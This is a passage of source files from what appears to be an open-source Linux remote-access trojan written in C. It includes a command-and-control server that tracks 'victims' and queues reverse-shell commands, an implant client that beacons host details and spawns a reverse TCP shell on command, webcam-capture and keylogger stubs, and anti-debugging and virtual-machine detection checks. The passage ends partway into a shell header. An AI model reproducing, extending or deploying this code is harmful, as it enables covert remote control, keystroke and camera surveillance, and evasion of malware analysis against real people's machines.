exit(EXIT_FAILURE); 47 | } 48 | for (int i = 0; i < count; i++){ 49 | v[i] = NULL; 50 | } 51 | return v; 52 | } 53 | 54 | bool net_cleanup_victims(net_client_beacon_t **p_victims){ 55 | for (int i = 0; i < NET_MAX_CLIENTS; i++){ 56 | free(p_victims[i]); 57 | } 58 | free(p_victims); 59 | return true; 60 | } 61 | 62 | net_server_beacon_t **net_create_commands(){ 63 | int count = NET_MAX_CLIENTS; 64 | net_server_beacon_t **v; 65 | v = malloc(count * sizeof(net_server_beacon_t)); 66 | if (v == NULL){ 67 | fprintf(stderr, "[x] %s\n", strerror(errno)); 68 | exit(EXIT_FAILURE); 69 | } 70 | for (int i = 0; i < count; i++){ 71 | v[i] = NULL; 72 | } 73 | return v; 74 | } 75 | 76 | bool net_cleanup_commands(net_server_beacon_t **p_commands){ 77 | for (int i = 0; i < NET_MAX_CLIENTS; i++){ 78 | free(p_commands[i]); 79 | } 80 | free(p_commands); 81 | return true; 82 | } 83 | 84 | bool net_update_commands_count(net_server_beacon_t **p_commands){ 85 | int n_commands = 0; 86 | for (int i = 0; i < NET_MAX_CLIENTS; i++){ 87 | if (p_commands[i] != NULL){ 88 | n_commands++; 89 | } 90 | NET_COMMANDS_TOTAL = n_commands; 91 | } 92 | return true; 93 | } 94 | 95 | pthread_mutex_t NET_PTHREAD_MUTEX_UPDATE_COMMANDS = PTHREAD_MUTEX_INITIALIZER; 96 | 97 | int net_update_commands(net_server_beacon_t *command, net_server_beacon_t **commands){ 98 | for (int i = 0; i < NET_MAX_CLIENTS; i++){ 99 | if (commands[i] != NULL && (strcmp(commands[i]->uuid, command->uuid) == 0)){ 100 | pthread_mutex_lock(&NET_PTHREAD_MUTEX_UPDATE_COMMANDS); 101 | commands[i] = command; 102 | pthread_mutex_unlock(&NET_PTHREAD_MUTEX_UPDATE_COMMANDS); 103 | return i; 104 | } 105 | } 106 | for (int i = 0; i < NET_MAX_CLIENTS; i++){ 107 | if (commands[i] == NULL){ 108 | pthread_mutex_lock(&NET_PTHREAD_MUTEX_UPDATE_COMMANDS); 109 | commands[i] = command; 110 | net_update_commands_count(commands); 111 | pthread_mutex_unlock(&NET_PTHREAD_MUTEX_UPDATE_COMMANDS); 112 | return i; 113 | } 114 | } 115 | return -1; 116 | } 117 | 118 | bool net_update_commands_shell(char *host, 119 | int port, 120 | char *uuid, 121 | net_server_beacon_t **p_commands){ 122 | /* 123 | :TODO: send reverse shell command to victim uuid 124 | :host: host domain or ip 125 | :port: shell port 126 | :uuid: victim uuid 127 | :p_commands: commands queue pointer 128 | :returns: boolean 129 | */ 130 | net_server_cmd_shell_t *p_cmd_shell = malloc(sizeof(net_server_cmd_shell_t)); 131 | net_server_beacon_t *p_command = malloc(sizeof(net_server_beacon_t)); 132 | strncpy(p_cmd_shell->host, host, MAX_DOMAIN_LEN); 133 | p_cmd_shell->port = port; 134 | p_command->xor_key = crypt_random_xor_key(); 135 | strncpy(p_command->uuid, uuid, SYS_UUID_SIZE); 136 | p_command->status = true; 137 | p_command->command = NET_SERVER_CMD_SHELL; 138 | memcpy(p_command->data, p_cmd_shell, sizeof(net_server_cmd_shell_t)); 139 | net_update_commands(p_command, p_commands); 140 | free(p_cmd_shell); 141 | return true; 142 | } 143 | 144 | bool net_remove_commands(net_server_beacon_t *command, net_server_beacon_t **commands){ 145 | for (int i = 0; i < NET_MAX_CLIENTS; i++){ 146 | if (commands[i] != NULL && strcmp(commands[i]->uuid, command->uuid) == 0){ 147 | memset(commands[i], 0, sizeof(net_server_beacon_t)); 148 | commands[i] = NULL; 149 | free(commands[i]); 150 | net_update_commands_count(commands); 151 | return true; 152 | } 153 | } 154 | return false; 155 | } 156 | 157 | bool net_update_victim_count(net_client_beacon_t **p_victims){ 158 | /* 159 | :TODO: update victim counter 160 | :returns: boolean 161 | */ 162 | int n_victims = 0; 163 | for (int i = 0; i < NET_MAX_CLIENTS; i++){ 164 | if (p_victims[i] != NULL){ 165 | n_victims++; 166 | } 167 | } 168 | NET_VICTIMS_TOTAL = n_victims; 169 | return true; 170 | } 171 | 172 | pthread_mutex_t NET_PTHREAD_MUTEX_UPDATE_VICTIMS = PTHREAD_MUTEX_INITIALIZER; 173 | 174 | int net_update_victims(net_client_beacon_t *victim, net_client_beacon_t **p_victims){ 175 | /* 176 | :TODO: set pointer to current victims client beacon 177 | :p_victim: pointer to victim client beacon 178 | :returns: -1 on failure and element index on success 179 | */ 180 | 181 | for (int i = 0; i < NET_MAX_CLIENTS; i++){ 182 | if (p_victims[i] != NULL && 183 | (strcmp(p_victims[i]->sysinfo.uuid, victim->sysinfo.uuid) == 0)){ 184 | pthread_mutex_lock(&NET_PTHREAD_MUTEX_UPDATE_VICTIMS); 185 | p_victims[i] = victim; 186 | pthread_mutex_unlock(&NET_PTHREAD_MUTEX_UPDATE_VICTIMS); 187 | return i; 188 | } 189 | } 190 | for (int i = 0; i < NET_MAX_CLIENTS; i++){ 191 | if (p_victims[i] == NULL){ 192 | pthread_mutex_lock(&NET_PTHREAD_MUTEX_UPDATE_VICTIMS); 193 | p_victims[i] = victim; 194 | net_update_victim_count(p_victims); 195 | pthread_mutex_unlock(&NET_PTHREAD_MUTEX_UPDATE_VICTIMS); 196 | return i; 197 | } 198 | } 199 | fprintf(stderr, "[-] net_victims_max limit reached\n"); 200 | return -1; 201 | } 202 | 203 | bool net_remove_victims(net_client_beacon_t *victim, net_client_beacon_t **p_victims){ 204 | /* 205 | :TODO: remove victim from list 206 | :p_victim: pointer to victim struct 207 | :returns: boolean 208 | */ 209 | for (int i = 0; i < NET_MAX_CLIENTS; i++){ 210 | if (p_victims[i] != NULL && 211 | (strcmp(p_victims[i]->sysinfo.uuid, victim->sysinfo.uuid) == 0)){ 212 | memset(p_victims[i], 0, sizeof(net_client_beacon_t)); 213 | p_victims[i] = NULL; 214 | free(p_victims[i]); 215 | net_update_victim_count(p_victims); 216 | return true; 217 | } 218 | } 219 | return false; 220 | } 221 | 222 | #ifndef NET_T_CLIENT_ARGS 223 | typedef struct{ 224 | int client_fd; 225 | net_client_beacon_t **p_victims; 226 | net_server_beacon_t **p_commands; 227 | } net_t_client_args_t; 228 | #define NET_T_CLIENT_ARGS 229 | #endif 230 | 231 | void *net_t_client(void *args){ 232 | net_t_client_args_t *p_args = args; 233 | int sock = p_args->client_fd; 234 | net_client_beacon_t **p_victims = p_args->p_victims; 235 | net_server_beacon_t **p_commands = p_args->p_commands; 236 | net_client_beacon_t *p_net_client_beacon = malloc(sizeof(net_client_beacon_t)); 237 | net_server_beacon_t *p_net_server_beacon = malloc(sizeof(net_server_beacon_t)); 238 | while (true){ 239 | bool command = false; 240 | int read = recv(sock, p_net_client_beacon, sizeof(net_client_beacon_t), 0); 241 | if (!read){ 242 | break; 243 | } 244 | if (read < 0){ 245 | fprintf(stderr, "[-] %s\n", strerror(errno)); 246 | free(p_net_client_beacon); 247 | pthread_exit(NULL); 248 | } 249 | //crypt_decrypt_xor((void *)p_net_client_beacon, sizeof(net_client_beacon_t), 10); 250 | net_update_victims(p_net_client_beacon, p_victims); 251 | /* printf("[+] victims: %d\n", NET_VICTIMS_TOTAL); */ 252 | /* printf("[+] CONNECT user:%s@%s, hostname:%s, arch:%s, release:%s, load:%d\n", */ 253 | /* p_net_client_beacon->sysinfo.username, */ 254 | /* p_net_client_beacon->sysinfo.ip, */ 255 | /* p_net_client_beacon->sysinfo.hostname, */ 256 | /* p_net_client_beacon->sysinfo.arch, */ 257 | /* p_net_client_beacon->sysinfo.release, */ 258 | /* p_net_client_beacon->sysinfo.cpu_usage); */ 259 | for (int i = 0; i < NET_MAX_CLIENTS; i++){ 260 | if (p_commands[i] != NULL && 261 | (strcmp(p_net_client_beacon->sysinfo.uuid, 262 | p_commands[i]->uuid) == 0)){ 263 | command = true; 264 | if (send(sock, p_commands[i], sizeof(net_server_beacon_t), 0) < 0){ 265 | fprintf(stderr, "[-] %s\n", strerror(errno)); 266 | } 267 | net_remove_commands(p_commands[i], p_commands); 268 | } 269 | } 270 | if (command == false){ 271 | //memset(p_net_server_beacon, 0, sizeof(net_server_beacon_t)); 272 | p_net_server_beacon->xor_key = DEFS_XOR_KEY; 273 | p_net_server_beacon->status = true; 274 | if (send(sock, p_net_server_beacon, sizeof(net_server_beacon_t), 0) < 0){ 275 | fprintf(stderr, "[x] %s\n", strerror(errno)); 276 | free(p_net_server_beacon); 277 | free(p_net_client_beacon); 278 | pthread_exit(NULL); 279 | } 280 | } 281 | } 282 | /* printf("[+] DISCONNECT user:%s@%s, hostname:%s, arch:%s, release:%s, load:%d\n", */ 283 | /* p_net_client_beacon->sysinfo.username, */ 284 | /* p_net_client_beacon->sysinfo.ip, */ 285 | /* p_net_client_beacon->sysinfo.hostname, */ 286 | /* p_net_client_beacon->sysinfo.arch, */ 287 | /* p_net_client_beacon->sysinfo.release, */ 288 | /* p_net_client_beacon->sysinfo.cpu_usage); */ 289 | net_remove_victims(p_net_client_beacon, p_victims); 290 | /* printf("[+] victims %d\n", NET_VICTIMS_TOTAL); */ 291 | free(p_net_server_beacon); 292 | free(p_net_client_beacon); 293 | pthread_exit(NULL); 294 | } 295 | 296 | bool net_server(int port, 297 | net_client_beacon_t **p_victims, 298 | net_server_beacon_t **p_commands){ 299 | /* 300 | :TODO: start listening server 301 | :port: (int) server listening port 302 | :returns: (bool) 303 | */ 304 | if (port < NET_PORT_MIN || port > NET_PORT_MAX){ 305 | fprintf(stderr, "[x] server port is invalid\n"); 306 | return false; 307 | } 308 | int server_fd, client_fd; 309 | struct sockaddr_in server, client; 310 | server_fd = socket(AF_INET, SOCK_STREAM, 0); 311 | if (server_fd < 0){ 312 | fprintf(stderr, "[x] %s\n", strerror(errno)); 313 | return false; 314 | } 315 | if (setsockopt(server_fd, 316 | SOL_SOCKET, 317 | SO_REUSEADDR, 318 | &(int){ 1 }, 319 | sizeof(int)) < 0){ 320 | fprintf(stderr, "[-] %s\n", strerror(errno)); 321 | } 322 | memset(&server, 0, sizeof(server)); 323 | server.sin_family = AF_INET; 324 | server.sin_port = htons(port); 325 | server.sin_addr.s_addr = htonl(INADDR_ANY); 326 | 327 | if (bind(server_fd, (struct sockaddr *) &server, sizeof(server)) < 0){ 328 | fprintf(stderr, "[x] %s\n", strerror(errno)); 329 | return false; 330 | } 331 | //printf("[+] bind to port %d\n", ntohs(server.sin_port)); 332 | if (listen(server_fd, NET_MAX_CLIENTS) != 0){ 333 | fprintf(stderr, "[x] %s\n", strerror(errno)); 334 | return false; 335 | } 336 | //printf("[+] listening\n"); 337 | while (true){ 338 | socklen_t client_len = sizeof(client); 339 | net_t_client_args_t *p_net_t_client_args = malloc(sizeof(net_t_client_args_t)); 340 | while (( client_fd = accept(server_fd, 341 | (struct sockaddr *)&client, 342 | (socklen_t *)&client_len))){ 343 | pthread_t t_client; 344 | p_net_t_client_args->client_fd = client_fd; 345 | p_net_t_client_args->p_victims = p_victims; 346 | p_net_t_client_args->p_commands = p_commands; 347 | pthread_attr_t attr_t_client; 348 | pthread_attr_init(&attr_t_client); 349 | pthread_attr_setdetachstate(&attr_t_client, PTHREAD_CREATE_DETACHED); 350 | if (pthread_create(&t_client, &attr_t_client, net_t_client, p_net_t_client_args) < 0){ 351 | fprintf(stderr, "[-] %s\n", strerror(errno)); 352 | } 353 | } 354 | free(p_net_t_client_args); 355 | } 356 | close(client_fd); 357 | return true; 358 | } 359 | 360 | #ifndef NET_PTHREAD_SERVER_ASYNC_ARGS 361 | typedef struct{ 362 | int port; 363 | net_client_beacon_t **p_victims; 364 | net_server_beacon_t **p_commands; 365 | } net_pthread_server_args_t; 366 | #define NET_PTHREAD_SERVER_ASYNC_ARGS 367 | #endif 368 | 369 | void *net_pthread_server(void *args){ 370 | net_pthread_server_args_t *p_args = args; 371 | net_server(p_args->port, p_args->p_victims, p_args->p_commands); 372 | free(p_args); 373 | pthread_exit(NULL); 374 | } 375 | 376 | net_pthread_server_args_t *net_server_async(int port, 377 | net_client_beacon_t **p_victims, 378 | net_server_beacon_t **p_commands){ 379 | /* 380 | :TODO: create async server 381 | :port: server port 382 | :p_victims: pointer to victims 383 | :p_commands: pointer to command queue 384 | :returns: (net_pthread_server_args_t *) should free this after use 385 | */ 386 | net_pthread_server_args_t *p_net_pthread_server_async_args = malloc(sizeof(net_pthread_server_args_t)); 387 | p_net_pthread_server_async_args->port = port; 388 | p_net_pthread_server_async_args->p_victims = p_victims; 389 | p_net_pthread_server_async_args->p_commands = p_commands; 390 | pthread_t t_net_pthread_server; 391 | pthread_attr_t t_attr_net_pthread_server; 392 | pthread_attr_init(&t_attr_net_pthread_server); 393 | pthread_attr_setdetachstate(&t_attr_net_pthread_server, PTHREAD_CREATE_DETACHED); 394 | if(pthread_create(&t_net_pthread_server, 395 | &t_attr_net_pthread_server, 396 | net_pthread_server, 397 | p_net_pthread_server_async_args) < 0){ 398 | fprintf(stderr, "[x] %s\n", strerror(errno)); 399 | return NULL; 400 | } 401 | return p_net_pthread_server_async_args; 402 | } 403 | -------------------------------------------------------------------------------- /src/include/net.h: -------------------------------------------------------------------------------- 1 | /*-----------------------------------------------------------------------\ 2 | | Copyright (C) 2018 Lilly Chalupowski | 3 | | | 4 | | This program is free software: you can redistribute it and/or modify | 5 | | it under the terms of the GNU General Public License as published by | 6 | | the Free Software Foundation, either version 3 of the License, or | 7 | | (at your option) any later version. | 8 | | | 9 | | This program is distributed in the hope that it will be useful, | 10 | | but WITHOUT ANY WARRANTY; without even the implied warranty of | 11 | | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the | 12 | | GNU General Public License for more details. | 13 | | | 14 | | You should have received a copy of the GNU General Public License | 15 | | along with this program. If not, see . | 16 | \-----------------------------------------------------------------------*/ 17 | 18 | #include 19 | #include 20 | #include 21 | #include 22 | #include 23 | #include 24 | #include "stub/sys.h" 25 | 26 | 27 | #ifndef NET_TIMEOUT 28 | #define NET_TIMEOUT 5 29 | #endif 30 | 31 | #ifndef NET_PORT_MIN 32 | #define NET_PORT_MIN 1 33 | #endif 34 | 35 | #ifndef NET_DOMAIN_MAX 36 | #define NET_DOMAIN_MAX 253 37 | #endif 38 | 39 | #ifndef NET_PORT_MAX 40 | #define NET_PORT_MAX 65535 41 | #endif 42 | 43 | #ifndef NET_MAX_RESPONSE_SIZE 44 | #define NET_MAX_RESPONSE_SIZE 2960 45 | #endif 46 | 47 | #ifndef NET_MAX_DATA_SIZE 48 | #define NET_MAX_DATA_SIZE 1024 49 | #endif 50 | 51 | #ifndef NET_CLIENT_BEACON 52 | typedef struct{ 53 | int xor_key; 54 | sys_info_t sysinfo; 55 | } net_client_beacon_t; 56 | #define NET_CLIENT_BEACON 57 | #endif 58 | 59 | #ifndef NET_SERVER_CMD_BEACON 60 | typedef struct{ 61 | int xor_key; 62 | bool status; 63 | int command; 64 | char uuid[SYS_UUID_SIZE]; 65 | char data[NET_MAX_DATA_SIZE]; 66 | } net_server_beacon_t; 67 | #define NET_SERVER_CMD_BEACON 0 68 | typedef struct{ 69 | char host[NET_DOMAIN_MAX]; 70 | int port; 71 | } net_server_cmd_shell_t; 72 | #define NET_SERVER_CMD_SHELL 1 73 | #endif 74 | 75 | #ifndef NET_CLIENT_SLEEP 76 | #define NET_CLIENT_SLEEP 5 77 | #endif 78 | 79 | bool net_host2ip(char *host, char* ip, size_t ip_size){ 80 | /* 81 | :TODO: host to ip 82 | :host: host domain 83 | :ip: pointer to ip 84 | :returns: ip address 85 | */ 86 | struct hostent *he; 87 | struct in_addr **addr_list; 88 | int i; 89 | if ((he = gethostbyname(host)) == NULL){ 90 | herror("gethostbyname"); 91 | return false; 92 | } 93 | addr_list = (struct in_addr **) he->h_addr_list; 94 | for(i = 0; addr_list[i] != NULL; i++){ 95 | strncpy(ip , inet_ntoa(*addr_list[i]), ip_size); 96 | return true; 97 | } 98 | return false; 99 | } 100 | -------------------------------------------------------------------------------- /src/include/stub/cam.h: -------------------------------------------------------------------------------- 1 | /*-----------------------------------------------------------------------\ 2 | | Copyright (C) 2018 Lilly Chalupowski | 3 | | | 4 | | This program is free software: you can redistribute it and/or modify | 5 | | it under the terms of the GNU General Public License as published by | 6 | | the Free Software Foundation, either version 3 of the License, or | 7 | | (at your option) any later version. | 8 | | | 9 | | This program is distributed in the hope that it will be useful, | 10 | | but WITHOUT ANY WARRANTY; without even the implied warranty of | 11 | | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the | 12 | | GNU General Public License for more details. | 13 | | | 14 | | You should have received a copy of the GNU General Public License | 15 | | along with this program. If not, see . | 16 | \-----------------------------------------------------------------------*/ 17 | 18 | #include 19 | #include 20 | #include 21 | #include 22 | #include 23 | #include 24 | 25 | int webcam_device_handle(){ 26 | int webcam_fd; 27 | webcam_fd = open("/dev/video0", O_RDWR); 28 | if (webcam_fd < 0){ 29 | fprintf(stderr, "error: unable to read video device"); 30 | return -1; 31 | } 32 | return webcam_fd; 33 | } 34 | 35 | struct v4l2_capability *webcam_get_info(int webcam_fd){ 36 | struct v4l2_capability *p_webcam_cap = malloc(sizeof(struct v4l2_capability)); 37 | ioctl(webcam_fd, VIDIOC_QUERYCAP, p_webcam_cap); 38 | if (!(p_webcam_cap->capabilities & V4L2_CAP_VIDEO_CAPTURE)){ 39 | fprintf(stderr, "error: webcam does not support capture\n"); 40 | return NULL; 41 | } else{ 42 | return p_webcam_cap; 43 | } 44 | } 45 | 46 | struct v4l2_format *webcam_set_format(int webcam_fd, void *p_webcam_cap){ 47 | struct v4l2_capability *p_webcam_cap_in = p_webcam_cap; 48 | struct v4l2_format *p_webcam_format = malloc(sizeof(struct v4l2_format)); 49 | p_webcam_format->type = V4L2_BUF_TYPE_VIDEO_CAPTURE; 50 | p_webcam_format->fmt.pix.pixelformat = V4L2_PIX_FMT_MJPEG; 51 | ioctl(webcam_fd, VIDIOC_S_FMT, p_webcam_format); 52 | return p_webcam_format; 53 | } 54 | -------------------------------------------------------------------------------- /src/include/stub/keys.h: -------------------------------------------------------------------------------- 1 | /*-----------------------------------------------------------------------\ 2 | | Copyright (C) 2018 Lilly Chalupowski | 3 | | | 4 | | This program is free software: you can redistribute it and/or modify | 5 | | it under the terms of the GNU General Public License as published by | 6 | | the Free Software Foundation, either version 3 of the License, or | 7 | | (at your option) any later version. | 8 | | | 9 | | This program is distributed in the hope that it will be useful, | 10 | | but WITHOUT ANY WARRANTY; without even the implied warranty of | 11 | | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the | 12 | | GNU General Public License for more details. | 13 | | | 14 | | You should have received a copy of the GNU General Public License | 15 | | along with this program. If not, see . | 16 | \-----------------------------------------------------------------------*/ 17 | 18 | #include 19 | #include 20 | #include 21 | #include 22 | #include 23 | #include 24 | #include 25 | #include 26 | #include 27 | #include 28 | 29 | #ifndef KEYS_ASYNC 30 | #define KEYS_ASYNC_FALSE 0 31 | #define KEYS_ASYNC_TRUE 1 32 | #define KEYS_ASYNC 33 | #endif 34 | 35 | #ifndef KEYS_GET_ALL_ARGS 36 | typedef struct{ 37 | char keyboard_dev[PATH_MAX]; 38 | } keys_get_all_args_t; 39 | #define KEYS_GET_ALL_ARGS 40 | #endif 41 | 42 | int keys_get_fd(char *keyboard_dev){ 43 | /* 44 | :TODO: get keyboard file descriptor from device path 45 | :keyboard_dev: (char *) device path 46 | :returns: (int) keyboard file descriptor 47 | */ 48 | int keyboard_fd = open(keyboard_dev, O_RDONLY); 49 | if (keyboard_fd < 0){ 50 | fprintf(stderr, 51 | "error: unable to get file descriptor for %s\n", 52 | keyboard_dev); 53 | return -1; 54 | } else{ 55 | return keyboard_fd; 56 | } 57 | } 58 | 59 | void *keys_get_all_main(void *args){ 60 | /* 61 | :TODO: start capturing all keys even w/o x11 62 | :returns: boolean 63 | */ 64 | keys_get_all_args_t *p_keys_get_all_args = args; 65 | char *keyboard_dev = p_keys_get_all_args->keyboard_dev; 66 | int keyboard_fd = keys_get_fd(keyboard_dev); 67 | if (keyboard_fd < 0){ 68 | return false; 69 | } 70 | struct input_event ev; 71 | while (1){ 72 | read(keyboard_fd, &ev, sizeof(struct input_event)); 73 | if(ev.type == 1){ 74 | printf("key %i state %i\n", ev.code, ev.value); 75 | } 76 | } 77 | return NULL; 78 | } 79 | 80 | bool key_get_all(char *keyboard_dev, int async){ 81 | keys_get_all_args_t *p_keys_get_all_args = malloc(sizeof(keys_get_all_args_t)); 82 | p_keys_get_all_args->keyboard_dev = keyboard_dev; 83 | if (async == KEYS_ASYNC_TRUE){ 84 | pthread_t keys_get_all_thread; 85 | pthread_create(&keys_get_all_thread, 86 | NULL, 87 | keys_get_all_main, 88 | p_keys_get_all_args); 89 | if (async == KEYS_ASYNC_FALSE){ 90 | pthread_join(keys_get_all_thread, NULL); 91 | free(p_keys_get_all_args); 92 | } 93 | } 94 | return true; 95 | } 96 | -------------------------------------------------------------------------------- /src/include/stub/net.h: -------------------------------------------------------------------------------- 1 | /*-----------------------------------------------------------------------\ 2 | | Copyright (C) 2018 Lilly Chalupowski | 3 | | | 4 | | This program is free software: you can redistribute it and/or modify | 5 | | it under the terms of the GNU General Public License as published by | 6 | | the Free Software Foundation, either version 3 of the License, or | 7 | | (at your option) any later version. | 8 | | | 9 | | This program is distributed in the hope that it will be useful, | 10 | | but WITHOUT ANY WARRANTY; without even the implied warranty of | 11 | | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the | 12 | | GNU General Public License for more details. | 13 | | | 14 | | You should have received a copy of the GNU General Public License | 15 | | along with this program. If not, see . | 16 | \-----------------------------------------------------------------------*/ 17 | 18 | #include 19 | #include 20 | #include 21 | #include 22 | #include 23 | #include 24 | #include 25 | #include "shell.h" 26 | #include "../crypt.h" 27 | #include "../net.h" 28 | #include "../defs.h" 29 | 30 | bool net_client(char *host, int port){ 31 | /* 32 | :TODO: stub network client 33 | :returns: boolean 34 | */ 35 | if (port < NET_PORT_MIN || port > NET_PORT_MAX){ 36 | fprintf(stderr, "[x] server port is invalid\n"); 37 | return false; 38 | } 39 | 40 | int sock_fd; 41 | char response[NET_MAX_RESPONSE_SIZE]; 42 | struct sockaddr_in server; 43 | 44 | memset(response, 0, sizeof(response)); 45 | 46 | memset(&server, 0, sizeof(server)); 47 | server.sin_family = AF_INET; 48 | server.sin_addr.s_addr = inet_addr(host); 49 | server.sin_port = htons(port); 50 | 51 | net_server_beacon_t *p_net_server_beacon = malloc(sizeof(net_client_beacon_t)); 52 | net_client_beacon_t *p_net_client_beacon = malloc(sizeof(net_client_beacon_t)); 53 | 54 | sys_info_t sysinfo; 55 | 56 | sys_public_ip(sysinfo.ip); 57 | sys_username(sysinfo.username, SYS_USERNAME_SIZE); 58 | sys_arch(sysinfo.arch, SYS_ARCH_SIZE); 59 | sys_get_uuid(sysinfo.uuid); 60 | sys_hostname(sysinfo.hostname, SYS_HOSTNAME_SIZE); 61 | sys_release(sysinfo.release, SYS_RELEASE_SIZE); 62 | sysinfo.cpu_usage = sys_load_average(); 63 | sysinfo.ping = sys_ping(); 64 | 65 | while(true){ 66 | sock_fd = socket(AF_INET, SOCK_STREAM, 0); 67 | if (sock_fd < 0){ 68 | fprintf(stderr, "[x] failed to create socket\n"); 69 | return false; 70 | } 71 | 72 | if (connect(sock_fd, (struct sockaddr *)&server, sizeof(server)) < 0){ 73 | fprintf(stderr, "[-] failed to connect to server retrying in %ds\n", NET_CLIENT_SLEEP); 74 | close(sock_fd); 75 | sleep(NET_CLIENT_SLEEP); 76 | continue; 77 | } else{ 78 | printf("[+] connected to %s:%d\n", 79 | inet_ntoa(server.sin_addr), 80 | ntohs(server.sin_port)); 81 | } 82 | 83 | while(true){ 84 | p_net_client_beacon->xor_key = crypt_random_xor_key(); 85 | p_net_client_beacon->sysinfo = sysinfo; 86 | p_net_client_beacon->sysinfo.cpu_usage = sys_load_average(); 87 | p_net_client_beacon->sysinfo.ping = sys_ping(); 88 | //p_net_client_beacon->sysinfo.cpu_usage = sys_load_average(); 89 | // crypt_decrypt_xor((void *)p_net_client_beacon, sizeof(net_client_beacon_t), 10); 90 | if (send(sock_fd, p_net_client_beacon, sizeof(net_client_beacon_t), 0) < 0){ 91 | fprintf(stderr, 92 | "[-] failed to send data to %s:%d\n", 93 | inet_ntoa(server.sin_addr), 94 | ntohs(server.sin_port)); 95 | break; 96 | } 97 | if (recv(sock_fd, p_net_server_beacon, sizeof(net_server_beacon_t), 0) <= 0){ 98 | fprintf(stderr, 99 | "[-] failed to receive data from %s:%d\n", 100 | inet_ntoa(server.sin_addr), 101 | ntohs(server.sin_port)); 102 | break; 103 | } else{ 104 | if (p_net_server_beacon->status == true){ 105 | if (p_net_server_beacon->command == NET_SERVER_CMD_BEACON){ 106 | printf("[+] %s:%d OK\n", 107 | inet_ntoa(server.sin_addr), 108 | ntohs(server.sin_port)); 109 | } else if (p_net_server_beacon->command == NET_SERVER_CMD_SHELL){ 110 | printf("[+] cmd shell beacon\n"); 111 | net_server_cmd_shell_t *p_net_server_cmd_shell = malloc(sizeof(net_server_cmd_shell_t)); 112 | memcpy(p_net_server_cmd_shell, p_net_server_beacon->data, sizeof(net_server_cmd_shell_t)); 113 | shell_spawn_reverse_tcp(p_net_server_cmd_shell->host, p_net_server_cmd_shell->port, SHELL_SH, SHELL_ASYNC_FALSE); 114 | } else { 115 | printf("[-] response data corrupt or command not supported\n"); 116 | } 117 | } else{ 118 | fprintf(stderr, "[-] beacon status failed\n"); 119 | } 120 | } 121 | sleep(NET_CLIENT_SLEEP); 122 | } 123 | close(sock_fd); 124 | } 125 | return true; 126 | } 127 | -------------------------------------------------------------------------------- /src/include/stub/re.h: -------------------------------------------------------------------------------- 1 | /*-----------------------------------------------------------------------\ 2 | | Copyright (C) 2018 Lilly Chalupowski | 3 | | | 4 | | This program is free software: you can redistribute it and/or modify | 5 | | it under the terms of the GNU General Public License as published by | 6 | | the Free Software Foundation, either version 3 of the License, or | 7 | | (at your option) any later version. | 8 | | | 9 | | This program is distributed in the hope that it will be useful, | 10 | | but WITHOUT ANY WARRANTY; without even the implied warranty of | 11 | | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the | 12 | | GNU General Public License for more details. | 13 | | | 14 | | You should have received a copy of the GNU General Public License | 15 | | along with this program. If not, see . | 16 | \-----------------------------------------------------------------------*/ 17 | 18 | #include 19 | #include 20 | #include 21 | #include 22 | #include 23 | 24 | extern unsigned char* _start; 25 | extern unsigned char* __etext; 26 | 27 | bool re_ptrace(){ 28 | /* 29 | :TODO: check for debugger 30 | :returns: boolean 31 | */ 32 | if (ptrace(PTRACE_TRACEME, 0, 1, 0) == -1){ 33 | return true; 34 | } else{ 35 | return false; 36 | } 37 | } 38 | 39 | #ifndef RE_KERNEL_MODULE_NAME_MAX_SIZE 40 | #define RE_KERNEL_MODULE_NAME_MAX_SIZE 32 41 | #endif 42 | 43 | #ifndef RE_BASH_COMMAND_MAX_LEN 44 | #define RE_BASH_COMMAND_MAX_LEN 256 45 | #endif 46 | 47 | bool re_kernel_module(char *kernel_module){ 48 | /* 49 | :TODO: check if kernel module is loaded 50 | :returns: boolean 51 | */ 52 | if (strlen(kernel_module) + 16 > RE_BASH_COMMAND_MAX_LEN){ 53 | fprintf(stderr, "[x] kernel module name length exceeds limitations\n"); 54 | return false; 55 | } 56 | char command[RE_BASH_COMMAND_MAX_LEN]; 57 | sprintf(command, "grep -Po '^%s\x20' /proc/modules", kernel_module); 58 | FILE *fd = popen(command, "r"); 59 | if (fd == NULL){ 60 | fprintf(stderr, "[x] failed to read kernel module list"); 61 | return false; 62 | } 63 | char buff[RE_KERNEL_MODULE_NAME_MAX_SIZE]; 64 | memset(buff, 0, sizeof(buff)); 65 | fread(buff, 1, strlen(kernel_module), fd); 66 | if (strncmp(buff, kernel_module, strlen(kernel_module)) == 0){ 67 | return true; 68 | } else{ 69 | return false; 70 | } 71 | } 72 | 73 | bool re_kernel_modules(){ 74 | /* 75 | :TODO: check for kernel modules 76 | :returns: boolean 77 | */ 78 | if (re_kernel_module("virtio") == true){ 79 | return true; 80 | } else if (re_kernel_module("vboxvideo") == true){ 81 | return true; 82 | } else if (re_kernel_module("vboxguest") == true){ 83 | return true; 84 | } else if (re_kernel_module("vboxsf") == true){ 85 | return true; 86 | } else{ 87 | return false; 88 | } 89 | } 90 | 91 | bool re_hypervisor(){ 92 | /* 93 | :TODO: detect hypervisor 94 | :returns: boolean 95 | */ 96 | char hypervisor[] = "hypervisor"; 97 | char command[] = "grep -m 1 -Po 'hypervisor' /proc/cpuinfo"; 98 | char buff[RE_KERNEL_MODULE_NAME_MAX_SIZE]; 99 | FILE *fd = popen(command, "r"); 100 | if (fd == NULL){ 101 | fprintf(stderr, "[x] failed to read cpuinfo"); 102 | return false; 103 | } 104 | memset(buff, 0, sizeof(buff)); 105 | fread(buff, 1, strlen(hypervisor), fd); 106 | if (strncmp(buff, hypervisor, strlen(hypervisor)) == 0){ 107 | return true; 108 | } else{ 109 | return false; 110 | } 111 | } 112 | 113 | int re_breakpoints(){ 114 | /* 115 | :TODO: detect breakpoint count (may have false positives) 116 | :returns: (int) breakpoint count 117 | */ 118 | int count = 0; 119 | char* start = (char*)&_start; 120 | char* end = (char*)&__etext; 121 | volatile unsigned char bppart[1] = { 0x66 }; 122 | while(start != end) { 123 | if(((*(volatile unsigned*)start) & 0xFF) == ((*bppart) + (*bppart))) { 124 | ++count; 125 | } 126 | ++start; 127 | } 128 | return count; 129 | } 130 | -------------------------------------------------------------------------------- /src/include/stub/shell.h: -------------------------------------------------------------------------------- 1 | /*-----------------------------------------------------------------------\ 2 | | Copyright (C) 2018 Lilly Chalupowski | 3 | | | 4 | | This program is free software: you can redistribute it and/or modify | 